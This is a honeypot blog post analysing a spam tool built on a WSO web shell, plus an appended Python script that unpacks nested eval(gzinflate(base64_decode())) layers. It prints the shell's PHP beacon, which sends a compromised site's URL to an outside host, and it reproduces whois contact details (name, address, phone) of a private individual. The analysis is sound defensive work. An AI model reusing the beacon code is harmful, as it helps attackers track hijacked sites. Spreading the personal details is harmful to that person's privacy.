An email spamming tool layered on top of an instance of the WSO web shell. There's also a little chunk of "phone home" code:
    if (file_exists('data.bin')==false){
        $url = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
        file_get_contents("http://3x.od.ua/shell/index.php?shell=".base64_encode($url));
        $fp1 = fopen("data.bin", "w");
        fclose($fp1);
    }
Sends the URL of db-config.php to a Ukrainian web site.
Leaves an empty file named "data.bin" lying around.
My honey pot caught another one of these 2019-11-14. Essentially unchanged.
person: Vilko Damianov
address: 4000, Bulgaria, Plovdiv, 2 Lyuben Karavelov, unit 5
phone: +35932571279
nic-hdl: VD3206-RIPE
mnt-by: HZ-HOSTING-LTD
created: 2016-11-28T15:25:07Z
last-modified: 2016-11-28T15:25:07Z
source: RIPE
% Information related to '5.149.250.0/23AS61046'
route: 5.149.250.0/23
descr: HZ-HOSTING-LTD
origin: AS61046
mnt-by: HZ-HOSTING-LTD
created: 2013-03-05T14:08:17Z
last-modified: 2016-11-28T19:10:21Z
source: RIPE
5.149.250.196 is apparently located in London, UK.
Downloaded to a fake WSO web shell, part of a WordPress honey pot. Apparently part of a larger campaign to re-compromise WordPress sites on which someone else had previously installed WSO.
Did a string of hand edits and executions:
5.149.250.196WjcyqoD-WcEZBqVmxA8u7wAAAAA.0.file → dc1.php
dc1.php → dc2.php
dc2.php → dc3.php
dc3.php → dc4.php
dc4.php → dc5.php
dc5.php → dc6.php
dc6.php → dc8.php
dc8.php → dc9.php
In each case, I had to replace eval with print, and possibly add a "<?php" opening tag.
Some automated encoding program must exist that lets you choose how many layers of about 3 different obfuscation methods get applied.
File dc9.php has the code that a correct invocation of its URL would execute, after the 8 or 9 levels of eval(gzinflate(base64_decode())) get executed.
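The eval-to-print edit repeated eight or nine times can be done statically instead, without ever running the sample. Below is an added example (my code, not anything from the post or from the shell's author) that peels nested eval(gzinflate(base64_decode('...'))) wrappers in Python; the packed sample it operates on is constructed inline, and the innermost script in it is a harmless placeholder.

```python
import base64
import re
import zlib

# One eval(gzinflate(base64_decode('...'))) wrapper, the pattern each of dc1.php .. dc8.php consisted of.
LAYER_RE = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]*)['"]\s*\)\s*\)\s*\)\s*;?"""
)

def unwrap_layer(php_source):
    """Decode one wrapper statically and return the inner PHP, or None if no wrapper is present."""
    m = LAYER_RE.search(php_source)
    if m is None:
        return None
    raw = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
    # PHP's gzinflate() consumes a raw DEFLATE stream (no zlib/gzip header), hence wbits=-15.
    return zlib.decompress(raw, -15).decode("utf-8", errors="replace")

def unwrap_all(php_source, max_layers=32):
    """Peel wrappers until plain code remains; returns (final_source, layers_removed).
    max_layers bounds the loop in case a sample is packed absurdly deep."""
    layers = 0
    while layers < max_layers:
        inner = unwrap_layer(php_source)
        if inner is None:
            break
        php_source, layers = inner, layers + 1
    return php_source, layers

def wrap_layer(php_source):
    """Build one wrapper the way a packer would; used here only to construct test input."""
    comp = zlib.compressobj(wbits=-15)  # raw DEFLATE, matching PHP's gzdeflate()
    deflated = comp.compress(php_source.encode()) + comp.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(deflated).decode()

# Constructed sample: a harmless inner script packed under three layers, like dc1.php -> dc4.php.
INNER_CODE = "echo 'innermost layer';"
SAMPLE_FILE = "<?php " + wrap_layer(wrap_layer(wrap_layer(INNER_CODE)))

if __name__ == "__main__":
    code, depth = unwrap_all(SAMPLE_FILE)
    print("peeled %d layers, recovered: %s" % (depth, code))
```

Real samples mix in other transforms besides this one (the post counts about three), so a wrapper the regex does not match simply stops the loop and the remaining text is left for a manual look.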